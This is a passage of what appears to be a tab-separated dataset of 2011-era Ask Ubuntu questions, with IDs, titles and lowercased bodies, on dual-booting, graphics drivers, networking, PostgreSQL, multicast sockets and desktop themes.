ff a1 94 89 ff 81 70 62 ff 81 70 62 ff | ] vp ... ... pb..pb.| 00000030 81 70 62 ff 81 70 62 ff 81 70 62 ff a1 94 89 ff |.pb..pb..pb ... ..| 00000040 4d 43 3a ff fa f2 ec ff fb f6 f1 ff fc f8 f4 ff |mc : ... ... ... ... .| 00000050 fc f8 f4 ff fc f8 f4 ff 5d 56 50 ff a1 94 89 ff | ... ... .. ] vp ... ..| 00000060 81 70 62 ff 81 70 62 ff 81 70 62 ff 81 70 62 ff |.pb..pb..pb..pb.| 00000070 81 70 62 ff a1 94 89 ff 4d 43 3a ff fa f2 ec ff |.pb ... ..mc : ... ..| 00000080 fb f6 f1 ff fc f8 f4 ff fc f8 f4 ff fc f8 f4 ff | ... ... ... ... ... .| 00000090 5d 56 50 ff a0 93 89 ff 80 6f 61 ff 80 6f 61 ff | ] vp ... ... oa..oa.| 000000a0 80 6f 61 ff 80 6f 61 ff 80 6f 61 ff a0 93 89 ff |.oa..oa..oa ... ..| 000000b0 4d 43 3a ff fa f2 ed ff fb f6 f2 ff fc f8 f5 ff |mc : ... ... ... ... .| 000000c0 fc f8 f5 ff fc f8 f5 ff 5d 56 50 ff 9f 93 88 ff | ... ... .. ] vp ... ..| 000000d0 7f 6f 60 ff 7f 6f 60 ff 7f 6f 60 ff 7f 6f 60 ff |.o`..o`..o`..o`.| 000000e0 7f 6f 60 ff 9f 93 88 ff 4d 43 3a ff fa f2 ed ff |.o` ... ..mc : ... ..| 000000f0 fb f6 f2 ff fc f8 f5 ff fc f8 f5 ff fc f8 f5 ff | ... ... ... ... ... .| 00000100 5d 56 50 ff 9f 93 88 ff 7f 6f 60 ff 7f 6f 60 ff | ] vp ... ... o`..o`.| 00000110 7f 6f 60 ff 7f 6f 60 ff 7f 6f 60 ff 9f 93 88 ff |.o`..o`..o` ... ..| 00000120 4d 43 3a ff fa f2 ed ff fb f6 f2 ff fc f8 f5 ff |mc : ... ... ... ... .| 00000130 fc f8 f5 ff fc f8 f5 ff 5d 56 50 ff 9e 92 88 ff | ... ... .. ] vp ... ..| 00000140 7e 6e 60 ff 7e 6e 60 ff 7e 6e 60 ff 7e 6e 60 ff |~n`.~n`.~n`.~n`.| 00000150 7e 6e 60 ff 9e 92 88 ff 4d 43 3a ff fa f2 ed ff |~n` ... ..mc : ... ..| 00000160 fb f6 f2 ff fc f8 f5 ff fc f8 f5 ff fc f8 f5 ff | ... ... ... ... ... .| 00000170 5d 56 50 ff 9e 92 88 ff 7d 6d 5f ff 7d 6d 5f ff | ] vp ... .. } m_ . } m_.| 00000180 7d 6d 5f ff 7d 6d 5f ff 7d 6d 5f ff 9e 92 88 ff | } m_. } m_ . } m_ ... ..| 00000190 4d 43 3a ff fa f2 ed ff fb f6 f2 ff fc f8 f5 ff |mc : ... ... ... ... .| 000001a0 fc f8 f5 ff fc f8 f5 ff 5d 56 50 ff 9e 92 88 ff | ... ... .. ] vp ... ..| 000001b0 7d 6d 5f ff 7d 6d 5f ff 7d 6d 5f ff 7d 6d 00 fe | } m_. } m_. } m_ . } m..| 000001c0 ff ff 82 fe ff ff 02 00 00 00 00 50 32 00 00 00 | ... ... ... ..p2 ... | 000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 =============================== stderr messages : =============================== unlzma : decoder error according to this fedora 14 is visible in sda3 . does anybody know a way to add fedora 14 to grub.cfg of ubuntu so i can choose which os to boot ? thanks in advance .
50534	macbook pro ( 5 ) touchpad stops working after upgrading from ubuntu 10.10 to ubuntu 11.04	after upgrading from ubuntu 10.10 to ubuntu 11.04 , my macbook pro 's touchpad stopped working . it works fine on the login screen , but after logging in it stops working .
50535	gray `` apply '' button in networkmanager openvpn connection window	i installed all the necessary packages for the networkmanager-openvpn function to function . the openvpn-connection-setting are successfully imported into the networkmanger via the conf file but the apply button is grayed out , so that actually saving and using the connection is n't possible ? does anyone know , where the problem is ? it 's a fresh install of ubuntu 10.10 after the upgrade from 10.04 sent the networkmanger down the drain . i was told the following : sounds like a policy issue . read this thread : http : //ubuntuforums.org/showthread.php ? t=1616355 look carefully in the file mentioned , at the element . what is there ? `` no '' will cause the action detailed to be unavailable . ideally `` yes '' or `` auth_admin_keep '' should be there . they will either allow all access , or prompt for a admin password . the above does not seem to work for me - it still has a gray apply button . if i choose a file for user certificate as well as ca certificate `` which is all openvpn supplies and needs '' and a key file it will allow me to click apply - but obviously wont connect . : l i am at a lost end .
50538	are there plans to make a screensaver for unity ?	are there plans to develop a screensaver specifically for unity ? since unity uses gnome-screensaver by default currently , seems like a reasonable area for a desktop to attract much user appreciation . ( my personal interest is in a nice pictures folder type slideshow screensaver with more settings than currently offered in gnome-screensaver - ie folder specification , and duration/delay of slide . ) thank you .
50540	what is ubuntu 's definition of a `` registered application '' ?	i 've run into this a few times when installing apps from source , and during the occasional hack with update-alternatives . so far , it 's only been a minor annoyance ( ie , not got in the way of the end-goal ) but it 's now a frustration as it 's pointing to a hole in my knowledge-base ... so when i get a message that 'foo ' is `` not a registered application '' ( or i ca n't use foo 's default icon cuz ubuntu has no knowledge of 'foo ' ) : what defines a `` registered application '' ? how can i define an application installed from source ( and likely residing in $ home/bin/app-name ) such that it packs the same functionality as a package installed from a .deb ? ( if the solution is not self-evident from answer 1 ) example : i download and unpack daily dev builds of sublime-text-2 to /home/tom/bin/sublime-text-2 . i 've created a *.desktop file with appropriate shortcuts , etc . but the icon for sublime can not be display in any launcher even if i provide a full pathname to the option . the solution is to install a 2nd instance of sublime from a deb package . when i install sublime-text-2 from a .deb package , it installs under /usr/bin & & /usr/lib , the installed .desktop file is stored under /usr/share/applications , and the relevant line reads : icon=sublime_text . where 's the linkage i 'm missing ? somehow ubuntu knows how to exact the icon from sublime_text in the latter , but not in the former ( again , even with a full path provided ) .
50541	unity displaying bad colors . why ? how can i fix it ?	i 'm not sure how to explain this . so see the screenshot .
50544	how do i stop screenlet widgets from showing up in installed programs ?	i 've been running a couple screenlets for awhile and like them . i 'm only running two , although there are quite a few more in screenlets . however , today i found that icons for all of them , whether or not i 'm using them , have appeared in installed programs . curiously , they do not have identifying text under them , as do all other programs there . how do i get rid of them ?
50546	what exactly is the issue with nvidia geforce fx 5200 and unity ?	i am using the nvidia geforce fx 5200 and forced unity on startup . everything works fine including glxgears , however i do not have any visible icons in launcher . i know this has been reported as a bug . according to my logs it seems to be a g_dbus error . if the card was not blacklisted i believe d-bus would be finding the icons . i would like to know exactly what the issue is with this specific card .
50547	stitch scanned images using cli	i have scanned a newspaper article which was larger than the scanner glass . each page was scanned twice : the top and the bottom parts , where the middle part appeared in both images . is there a way to quickly match and stitch these scanned images , preferably using cli ? the panorama stitching tools i know require lengthy configuration , which is mostly irrelevant : lens size , focus , angle etc . hugin has a solution for this issue , but it is n't practical for batch jobs .
50551	accidental deletion of the gmail ( imap ) trash 'system label ' in evolution	i am using 11.04 and evolution 2.32.2 i accidentally deleted the gmail ( imap ) trash 'system label ' in evolution . because this is gmail object and ( not a label per say ) , it is not deletable in gmail . under my gmail account settings , i have made sure that both , 'show in label list ' and 'show in imap ' are checked . that being said , i can not seem to restore this imap folder in evolution . i deleted the affected mail account , re-created it , re-started evolution , and no change . any thoughts ? thanks .
50554	does 11.04 support sandy bridge ?	how well does ubuntu 11.04 ( natty narwhal ) support the processors of intel 's architecture sandy bridge and their intel hd graphics ? are there any problems with running 11.04 on sandy bridge ?
50559	why ca n't i change the color of the titlebar of ambiance ?	when i change the color for highlighted menu-entries for clearlook the window border is affected , too . this is n't the case with ambiance or radiance . why ? is it a bug or intended ?
50567	no wi-fi after system reboot	something strange is happening ... i 've installed a wi-fi card into my ubuntu server 11.04 machine . to configure it i do the following : sudo vi /etc/network/interfaces add : iface wlan0 inet dhcp wpa-driver wext wpa-ssid `` sweet home '' wpa-ap-scan 1 wpa-proto wpa wpa-pairwise tkip wpa-group tkip wpa-key-mgmt wpa-psk wpa-psk < a key > auto wlan0 then : $ sudo /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... ssh stop/waiting ssh start/running , process 1522 ssh stop/waiting ssh start/running , process 1590 and my machine successfully gets an ip to my wireless adapter . but after reboot it does n't get any ip in wireless network . to fix it i run /etc/init.d/networking restart again and all is fine again - it gets an ip . i understand that i simply should add it to my startup scripts to make it work properly , but maybe there is a better way to configure it ? upd : i 've tried to add it to startup ( put a link to restart script into /etc/rcs.d/s80restartwireless but no success ... it restarts but i still have to restart network manually to make it work .
50568	is there a way i can use wireless projectors ?	i can connect to the projector but i ca n't seem to find a way to output my presentations to the projector . i 'm using libreoffice and ubuntu 10.04 . i do quite a few presentations at my work and i am using the vga output and a wire connected to the projector . most of the projectors are now being updated with wireless units . yikes !
50570	integrated screen goes blank with dual-screen	while i had the hdmi exit connected to my tv , i configured my laptop screen to be turned off . now , everytime i connect the hdmi , my laptop screen goes blank and nothing appears on my tv . can you help me ?
50572	is it possible to install ubuntu 10.10 and/or ubuntu 11.04 on a late 2009 imac ?	i would like to install ubuntu on my imac 10,1 ( 21.5 inch display ) . i would prefer to instal natty narwhal , but would surely settle for maverick meerkat ( which i have a install dvd of ) . i have an install of os x snow leopard and a bootcamp partition of windows 7 . i would like to keep all these partitions and setup a triple boot system . if it can work , i 'm also wondering if it 'd be safe to install all updates from the update manager once it 's installed . thank you in advance . : )
50576	how to keep a window from overlapping into another workspace ?	it 's annoying to me how if a window is even a couple pixels off the right edge of my screen , when i switch to that right workspace , the system thinks that the window is there . the unity launcher bar gets hidden because of it and switching to that window keeps you on the current workspace where you ca n't even see the window cause it 's only a couple pixels . kde seems to do this much better where when you switch to another workspace , the window just is n't there . but well i do n't want kde . any way of getting that same behavior without the switch ? edit :
50577	server automatic reconnect ?	i 'm trying to setup a ubuntu hardware firewall ( just for fun : d ) and i was wondering if ubuntu 's network scripts could automatically reconnect to the wired interface ( eth0 ) when the connection is dropped ? my isp 's modem is pretty bad and requires a reset once in a while . it 's annoying to go to basement with a keyboard and blindly login and type /etc/init.d/networking restart .
50579	why does unity lag often that i have to manually shutdown/restart my core i3 laptop ?	i did a fresh install of ubuntu then do did some upgrades . after my next restart when i try to open ubuntu software center it took about 20 seconds for the window to load then 10 more seconds before it became click able . while doing some installation of software , unity lags like hell that every time i click any application it takes a few seconds before i can see it . even gedit take a lot of time to load . the worst part was when i was doing nothing to my computer . even on that part , my computer lags . my laptop is a brand new core i3 with 2gb of ram . unity should run perfectly on that kind of machine right ? btw : i reinstalled ubuntu 11.04 for about 5 times now and still nothing changed .
50581	is there an ubuntu theme available to make it look like windows 7 ?	i want to know is there any theme available make it ubuntu look like windows 7 ?
50585	how do i update lucid kernel	recently i have installed lucid in my pc , i have a low internet connection speed , but i want to update my kernel . so , i go to update manager to update it . but , i 'm confused what is the package to update the kernel . i just need to update my kernel not another application . so , what should i do ? ( sorry for my bad english )
50587	which big computer companies support the ubuntu project financially ?	when looking for hardware , i often try to find out if the manufacturer employs open source developers and things like that . i know canonical has relations with a couple of big computer companies , but who , apart from canonical , is supporting the community effort directly ? is there a list ?
50589	is there an ubuntu theme to make it look like os x ?	is there any theme available for ubuntu that will make it look similar to mac os x ?
50597	why is my nvidia additional driver installed but not in use	i am on ubuntu 11.04 , nvidia geforce 8600m gt , ubuntu classic . why is my driver installed but now in use ?
50599	how do you run a gui application without gui ( gui application as daemon on headless server ) ?	okay , so i want to run a gui application as daemon on a server without x . the application is a java program . it can be configured in a configuration file so the gui is not necessary to use it . unfortunately it does n't have a shell executable . i knew that one once , but forgot the solution . basically there is a program which fakes an x-server to other programs . finding that would be the ideal solution . just ca n't remember what it was called .
50604	application for taking pretty screenshots ( like os x does )	i 've been building a website for a guy who uses mac os x and occasionally he sends me screenshots of bugs . they come out looking like this : this is fairly typical of mac screenshots . you get the window decorations , the shadow from the window and a white or transparent background ( not the desktop wallpaper -- i 've checked ) . compare this to an ubuntu window-shot ( alt+print screen ) : it 's impossible to keep a straight face and say the ubuntu one anywhere near as elegant . my question is : is there an application that can do this in ubuntu ? edit : follow up : is there an application that can do this in one move ? shutter is pretty good but running the plugin for every screenshot is pretty tiresome as it does n't seem to remember my preference ( i want south-shadow and that requires selecting south , then clicking refresh , then save ) and it 's more clicks than i 'd like . is there a simple way of telling shutter i want south-shadow for all screenshots ( except entire desktop and area-selection ) ?
50605	is there a way to take a screenshot of your log-in screen on startup ?	i have a bug on my auto-log-in which is only shown when i log in the first time . there for i need a way to take a screenshot of my log-in screen when i start up . i know about this question , but the bug does n't appear when i log out . this is the bug that i want a screenshot for . i could take a real picture but my camera is very old and not that good really ...
50611	trouble installing additional driver	i tried to enable ati/amd fglrx graphic driver ( i 'm currently using ati mobility radeon hd 5470 graphics card . ) using system / administration / additional drivers . however , every time i tried , i got the message something like `` install failed . check /var/log/jockey.log log file . '' i ca n't paste the entire log , since its length is more than 5 times of maximum length of question . in the log , i found that the first error of the log is error : modinfo : could not find module fglrx . below is first parts of the log file . 2011-06-26 18:54:05,662 debug : fglrx is not the alternative in use 2011-06-26 18:54:05,708 debug : fglrx is not the alternative in use 2011-06-26 18:54:05,747 debug : fglrx is not the alternative in use 2011-06-26 18:54:13,166 debug : fglrx is not the alternative in use 2011-06-26 18:54:16,365 debug : installing package : linux-headers-2.6.32-30-generic 2011-06-26 18:54:16,600 debug : package linux-headers-2.6.32-30-generic does not exist , aborting 2011-06-26 18:54:16,733 debug : installing package : fglrx 2011-06-26 18:54:44,051 debug : install progress statuschange dpkg-exec 0.000000 2011-06-26 18:54:44,411 debug : install progress statuschange patch 0.000000 2011-06-26 18:54:44,512 debug : install progress statuschange patch 4.000000 2011-06-26 18:54:46,599 debug : install progress statuschange patch 8.000000 2011-06-26 18:54:46,697 debug : install progress statuschange patch 12.000000 2011-06-26 18:54:47,028 debug : install progress statuschange dkms 12.000000 2011-06-26 18:54:47,128 debug : install progress statuschange dkms 16.000000 2011-06-26 18:54:48,023 debug : install progress statuschange dkms 20.000000 2011-06-26 18:54:48,088 debug : install progress statuschange dkms 24.000000 2011-06-26 18:54:48,409 debug : install progress statuschange fakeroot 24.000000 2011-06-26 18:54:48,510 debug : install progress statuschange fakeroot 28.000000 2011-06-26 18:54:49,331 debug : install progress statuschange fakeroot 32.000000 2011-06-26 18:54:49,447 debug : install progress statuschange fakeroot 36.000000 2011-06-26 18:54:49,877 debug : install progress statuschange fglrx 36.000000 2011-06-26 18:54:49,977 debug : install progress statuschange fglrx 40.000000 2011-06-26 18:54:53,823 debug : install progress statuschange fglrx 44.000000 2011-06-26 18:54:53,896 debug : install progress statuschange fglrx 48.000000 2011-06-26 18:54:54,095 debug : install progress statuschange fglrx-amdcccle 48.000000 2011-06-26 18:54:54,196 debug : install progress statuschange fglrx-amdcccle 52.000000 2011-06-26 18:54:54,968 debug : install progress statuschange fglrx-amdcccle 56.000000 2011-06-26 18:54:55,051 debug : install progress statuschange fglrx-amdcccle 60.000000 2011-06-26 18:54:55,145 debug : install progress statuschange man-db 60.000000 2011-06-26 18:54:57,608 debug : install progress statuschange ureadahead 60.000000 2011-06-26 18:54:57,953 debug : install progress statuschange dpkg-exec 60.000000 2011-06-26 18:54:58,022 debug : install progress statuschange patch 60.000000 2011-06-26 18:54:58,119 debug : install progress statuschange patch 64.000000 2011-06-26 18:54:58,202 debug : install progress statuschange patch 68.000000 2011-06-26 18:54:58,268 debug : install progress statuschange dkms 68.000000 2011-06-26 18:54:59,127 debug : install progress statuschange dkms 72.000000 2011-06-26 18:54:59,197 debug : install progress statuschange dkms 76.000000 2011-06-26 18:54:59,269 debug : install progress statuschange fakeroot 76.000000 2011-06-26 18:54:59,352 debug : install progress statuschange fakeroot 80.000000 2011-06-26 18:54:59,462 debug : install progress statuschange fakeroot 84.000000 2011-06-26 18:54:59,563 debug : install progress statuschange fglrx 84.000000 2011-06-26 18:54:59,848 debug : install progress statuschange fglrx 88.000000 2011-06-26 18:55:37,663 debug : install progress statuschange fglrx 92.000000 2011-06-26 18:55:38,080 debug : install progress statuschange python-gmenu 92.000000 2011-06-26 18:55:38,656 debug : install progress statuschange fglrx-amdcccle 92.000000 2011-06-26 18:55:38,747 debug : install progress statuschange fglrx-amdcccle 96.000000 2011-06-26 18:55:38,814 debug : install progress statuschange fglrx-amdcccle 100.000000 2011-06-26 18:55:38,889 debug : install progress statuschange initramfs-tools 100.000000 2011-06-26 18:55:45,978 debug : install progress statuschange libc-bin 100.000000 2011-06-26 18:55:46,237 debug : install progress statuschange python-support 100.000000 2011-06-26 18:55:48,242 debug : selecting previously deselected package patch . ( reading database ... 201909 files and directories currently installed . ) unpacking patch ( from ... /patch_2.6-2ubuntu1_amd64.deb ) ... selecting previously deselected package dkms . unpacking dkms ( from ... /dkms_2.1.1.2-3ubuntu1.1_all.deb ) ... selecting previously deselected package fakeroot . unpacking fakeroot ( from ... /fakeroot_1.14.4-1ubuntu1_amd64.deb ) ... selecting previously deselected package fglrx . unpacking fglrx ( from ... /fglrx_2 % 3a8.780-0ubuntu2_amd64.deb ) ... selecting previously deselected package fglrx-amdcccle . unpacking fglrx-amdcccle ( from ... /fglrx-amdcccle_2 % 3a8.780-0ubuntu2_amd64.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up patch ( 2.6-2ubuntu1 ) ... setting up dkms ( 2.1.1.2-3ubuntu1.1 ) ... setting up fakeroot ( 1.14.4-1ubuntu1 ) ... update-alternatives : using /usr/bin/fakeroot-sysv to provide /usr/bin/fakeroot ( fakeroot ) in auto mode . setting up fglrx ( 2:8.780-0ubuntu2 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/gl.conf ( gl_conf ) in auto mode . update-initramfs : deferring update ( trigger activated ) update-initramfs : generating /boot/initrd.img-2.6.32-30-generic loading new fglrx-8.780 dkms files ... first installation : checking all kernels ... building for 2.6.32-30-generic and 2.6.35-28-generic building for architecture x86_64 module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . building initial module for 2.6.35-28-generic done . fglrx.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/2.6.35-28-generic/updates/dkms/ depmod ... ... . dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.posix.cache ... setting up fglrx-amdcccle ( 2:8.780-0ubuntu2 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-2.6.35-28-generic processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for python-support ... 2011-06-26 18:55:48,391 warning : modinfo for module fglrx failed : error : modinfo : could not find module fglrx 2011-06-26 18:55:48,391 warning : /sys/module/fglrx/drivers does not exist , can not rebind fglrx driver 2011-06-26 18:55:48,391 error : xorgdriverhandler.enable ( ) : package or module not installed , aborting what caused this error ? how can i install the driver ?
50612	how do i increase the icon size in unity ?	as my partner is registered blind she has difficulty with small text & icons . in 11.04 using unity the icons look quite good but i was checking the assistive technology section to see what was available only to find that it was gnome based . so far i prefer the unity looks and would like to know what options i have to increase icon sizes if that is what she prefers . another thing that could possibly assist would be to remove clutter . is it possible to remove the apps available for download section as this would offer more scope for increasing the visual effects ?
50616	firefox global application menu in classic desktop ?	i am using natty without unity , but i am a fan of the global menu applet . unfortunately , it does not work for firefox 5 ( and other programs that draw them themselves ) . how can i activate the special globalmenus for the non-unity globalmenu app ( or : is it possible ) ?
50617	how can i remove nvidia drivers ?	recently i installed ubuntu 11.04 ( 32 bit ) on my core i5 750 with a geforce 210 graphics card . unfortunately , it installs the nvidia drivers automatically , without any prompt ( unlike in earlier versions ) . this of causes a reboot to a command line shell . i ca n't even `` reinstall '' , as the install mechanism itself brings the driver on-board my system . how could i fix this ?
50618	switching mdadm to an external bitmap	i 've just read this in another post about improving raid5/6 write speeds : after increasing stripe cache & switching to external bitmap , my speeds are 160 mb/s writes , 260 mb/s reads . : -d i 've already found out how to increase the stripe cache and this worked pretty well but i 'd like to know more about an external bitmap . i have an incredibly fast ( 540mb/s ) raid0 ssd that would do well if a bitmap does what i think it does but i 'm still very unsure . i 've only known about them as long as i 've known this post . a few questions : what is a bitmap ( in terms of mdadm ) ? what are the advantages of an internal bitmap ( over external ) ? what are the advantages of an external bitmap ( over internal ) ? how do i switch between the two ? i should add that while this is a i'm-bored-let's-break-something thread , i do value the data stored on the raid array . if doing this is going to put data at significant risk , please let me know .
50621	can not connect to postgresql on port 5432	i installed the bitnami django stack which included postgresql 8.4 . when i run psql -u postgres i get the following error : psql : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? pg is definitely running and the pg_hba.conf file looks like this : # type database user cidr-address method # `` local '' is for unix domain socket connections only local all all md5 # ipv4 local connections : host all all 127.0.0.1/32 md5 # ipv6 local connections : host all all : :1/128 md5 what gives ? `` proof '' that pg is running : root @ assaf-desktop : /home/assaf # ps axf | grep postgres 14338 ? s 0:00 /opt/djangostack-1.3-0/postgresql/bin/postgres -d /opt/djangostack-1.3-0/postgresql/data -p 5432 14347 ? ss 0:00 \_ postgres : writer process 14348 ? ss 0:00 \_ postgres : wal writer process 14349 ? ss 0:00 \_ postgres : autovacuum launcher process 14350 ? ss 0:00 \_ postgres : stats collector process 15139 pts/1 s+ 0:00 \_ grep -- color=auto postgres root @ assaf-desktop : /home/assaf # netstat -nltp | grep 5432 tcp 0 0 127.0.0.1:5432 0.0.0.0 : * listen 14338/postgres tcp6 0 0 : :1:5432 : : : * listen 14338/postgres root @ assaf-desktop : /home/assaf #
50622	how to reinstall many removed packages at once ?	i used sudo apt-get remove python command and accidently removed a bunch of packages that were required . i logged in via command line and installed ubuntu-desktop again but there are other packages that are missing , and i 'm looking for a way to easily reinstall those removed packages . since there 's the log at software-center i wanted to ask what the easiest way might be to roll back changes or extract the removed packages list from the software center ... note : i typed sudo apt-get install ... . ... . ... ... for about two dozen of those removed programs in that list , but when i pressed enter it did n't install any of them because some package names could n't be found . the programs were removed at the same date .
50627	how do i configure multicast ?	can some one please explain the steps required to configure a multicast in ubuntu ? i have a simple program taken from internet . i get errors when i execute the client program . i get the error as : opening datagram socket ... .ok . setting so_reuseaddr ... ok . binding datagram socket ... ok . adding multicast group error : no such device : when i execute the server program i get the error as : opening the datagram socket ... ok . setting local interface error : can not assign requested address i am using ubuntu to run the program . i have two different laptops but connected via the same network . i am using wireless network to perform the above operation . client program # include < sys/types.h > # include < sys/socket.h > # include < arpa/inet.h > # include < netinet/in.h > # include < stdio.h > # include < stdlib.h > struct sockaddr_in localsock ; struct ip_mreq group ; int sd ; int datalen ; char databuf [ 1024 ] ; int main ( int argc , char *argv [ ] ) { /* create a datagram socket on which to receive . */ sd = socket ( af_inet , sock_dgram , 0 ) ; if ( sd < 0 ) { perror ( `` opening datagram socket error '' ) ; exit ( 1 ) ; } else printf ( `` opening datagram socket ... .ok.\n '' ) ; /* enable so_reuseaddr to allow multiple instances of this */ /* application to receive copies of the multicast datagrams . */ { int reuse = 1 ; if ( setsockopt ( sd , sol_socket , so_reuseaddr , ( char * ) & reuse , sizeof ( reuse ) ) < 0 ) { perror ( `` setting so_reuseaddr error '' ) ; close ( sd ) ; exit ( 1 ) ; } else printf ( `` setting so_reuseaddr ... ok.\n '' ) ; } /* bind to the proper port number with the ip address */ /* specified as inaddr_any . */ memset ( ( char * ) & localsock , 0 , sizeof ( localsock ) ) ; localsock.sin_family = af_inet ; localsock.sin_port = htons ( 4321 ) ; localsock.sin_addr.s_addr = inaddr_any ; if ( bind ( sd , ( struct sockaddr* ) & localsock , sizeof ( localsock ) ) ) { perror ( `` binding datagram socket error '' ) ; close ( sd ) ; exit ( 1 ) ; } else printf ( `` binding datagram socket ... ok.\n '' ) ; /* join the multicast group 226.1.1.1 on the local 203.106.93.94 */ /* interface . note that this ip_add_membership option must be */ /* called for each local interface over which the multicast */ /* datagrams are to be received . */ group.imr_multiaddr.s_addr = inet_addr ( `` 224.0.0.0 '' ) ; group.imr_interface.s_addr = inet_addr ( `` 233.106.93.94 '' ) ; if ( setsockopt ( sd , ipproto_ip , ip_add_membership , ( char * ) & group , sizeof ( group ) ) < 0 ) { perror ( `` adding multicast group error '' ) ; close ( sd ) ; exit ( 1 ) ; } else printf ( `` adding multicast group ... ok.\n '' ) ; /* read from the socket . */ datalen = sizeof ( databuf ) ; if ( read ( sd , databuf , datalen ) < 0 ) { perror ( `` reading datagram message error '' ) ; close ( sd ) ; exit ( 1 ) ; } else { printf ( `` reading datagram message ... ok.\n '' ) ; printf ( `` the message from multicast server is : \ '' % s\ '' \n '' , databuf ) ; } return 0 ; } server program # include < sys/types.h > # include < sys/socket.h > # include < arpa/inet.h > # include < netinet/in.h > # include < stdio.h > # include < stdlib.h > struct in_addr localinterface ; struct sockaddr_in groupsock ; int sd ; char databuf [ 1024 ] = `` multicast test message lol ! `` ; int datalen = sizeof ( databuf ) ; int main ( int argc , char *argv [ ] ) { /* create a datagram socket on which to send . */ sd = socket ( af_inet , sock_dgram , 0 ) ; if ( sd < 0 ) { perror ( `` opening datagram socket error '' ) ; exit ( 1 ) ; } else printf ( `` opening the datagram socket ... ok.\n '' ) ; /* initialize the group sockaddr structure with a */ /* group address of 225.1.1.1 and port 5555 . */ memset ( ( char * ) & groupsock , 0 , sizeof ( groupsock ) ) ; groupsock.sin_family = af_inet ; groupsock.sin_addr.s_addr = inet_addr ( `` 224.0.0.0 '' ) ; groupsock.sin_port = htons ( 4321 ) ; /* disable loopback so you do not receive your own datagrams . { char loopch = 0 ; if ( setsockopt ( sd , ipproto_ip , ip_multicast_loop , ( char * ) & loopch , sizeof ( loopch ) ) < 0 ) { perror ( `` setting ip_multicast_loop error '' ) ; close ( sd ) ; exit ( 1 ) ; } else printf ( `` disabling the loopback ... ok.\n '' ) ; } */ /* set local interface for outbound multicast datagrams . */ /* the ip address specified must be associated with a local , */ /* multicast capable interface . */ localinterface.s_addr = inet_addr ( `` 233.106.93.94 '' ) ; if ( setsockopt ( sd , ipproto_ip , ip_multicast_if , ( char * ) & localinterface , sizeof ( localinterface ) ) < 0 ) { perror ( `` setting local interface error '' ) ; exit ( 1 ) ; } else printf ( `` setting the local interface ... ok\n '' ) ; /* send a message to the multicast group specified by the*/ /* groupsock sockaddr structure . */ /*int datalen = 1024 ; */ if ( sendto ( sd , databuf , datalen , 0 , ( struct sockaddr* ) & groupsock , sizeof ( groupsock ) ) < 0 ) { perror ( `` sending datagram message error '' ) ; } else printf ( `` sending datagram message ... ok\n '' ) ; /* try the re-read from the socket if the loopback is not disable if ( read ( sd , databuf , datalen ) < 0 ) { perror ( `` reading datagram message error\n '' ) ; close ( sd ) ; exit ( 1 ) ; } else { printf ( `` reading datagram message from client ... ok\n '' ) ; printf ( `` the message is : % s\n '' , databuf ) ; } */ return 0 ; }
50628	have lampp use php code in a directory not under /opt/lampp	i have my lampp installed in the default /opt/lampp directory and the php code is in the htdocs folder . now , to edit any of the files i have to use sudo permissions and have to type my password ( or use sudo -i ) which i do not want to do . all i want is to know if i can somehow make lampp use the code that is residing in a folder not located under /opt/lampp/ . i tried giving full path and using a '.. ' relative path - both did not seem to work . or is it okay to do my work in /opt/lampp/ folder by using sudo all the the time ?
50630	set ctrl+alt+t to open a maximized terminal	i use the ctrl+alt+t shortcut to open a terminal , but i can not see how i can get it maximized . when i start it manually , i can simply do a gnome-terminal -- maximize , but that does not apply for the shortcut . even a changing of the .desktop files did not change anything . any way to let the shortcut open a maximized terminal window ? i use regular gnome 2 on ubuntu 11.04 with no compositing effects .
50631	how to install oracle 10g xe on ubuntu 11.04	i have read from here how to install oracle 10g xe in ubuntu 10.x but not in 11.04 ( 64 bit ) . but with 11.04 it does not work anymore because of dependency exceptions . so , how to install oracle 10g xe in ubuntu 11.04 ? i even found some variant how to fix it from here but in my case it does not work - the same exception take place : oracle-xe-universal : i386 depends on libc6 ( > = 2.3.2 ) ; however : package libc6 : i386 is not installed .
50643	what burg themes are available	what burg themes are available ? how do i install burg themes ?
50646	how do i install burg themes ?	i want to install some themes for burg , how do i do that ?
50650	user independant share folder	at the moment , i have a folder in my home directory that is shared on my laptop and can also be accessed by the other windows desktop pcs in my network but now i have decided to make my home folder inaccessible by other users on my laptop so other people can not look at my files if they have a user on my laptop . i set the permissions to none for everyone apart from me . i then changed the share folder ( /home/elliot/shared ) to allow all access but my windows computers and other users on my laptop can not access it even though they have the right permission , i think this is because they do n't have access to the home folder in which the shared folder is stored . where should i store a new shared folder on my laptop ? should i put it as /home/shared ? or , alternatively is there a way i can allow other users to access my /home/elliot/shared folder even if /home/elliot is inaccessible ? thanks in advance , ell .
50652	bind9 fails to start	after 3 weeks of trying to diagnose a failure of bind9 , to start i have to admit i need assistance . initially it was running correctly and when i made a modification to a bind file and re-run it an error msg came back rndc : 127.0.0.1 # 953 bind9 start fail it also fails to start on any other bind9 upgrade or required pkg . grep on mysql returns nothing now even if it is running , and dig on 127 only works when i have my phone connected as a modem . i do n't have any more diagnostics that i know of , so some help would be appreciated as development has stopped .
50654	thumbnail preview of flash files ? ( swf )	i have gnome and ubuntu 11.04 . as i 've got a lot of flash files , i would to have a preview for them . is it possible also to have the previews for a specific directory ? i 've tried also installing ffmpegthumbnailer package but it still does n't work ffmpegthumbnailer -i file.swf -o file.png [ swf @ 0x934ab0 ] max_analyze_duration reached [ swf @ 0x934ab0 ] estimating duration from bitrate , this may be inaccurate seeking in video failed , will use first frame [ swf @ 0x934b10 ] max_analyze_duration reached [ swf @ 0x934b10 ] estimating duration from bitrate , this may be inaccurate what can i try ?
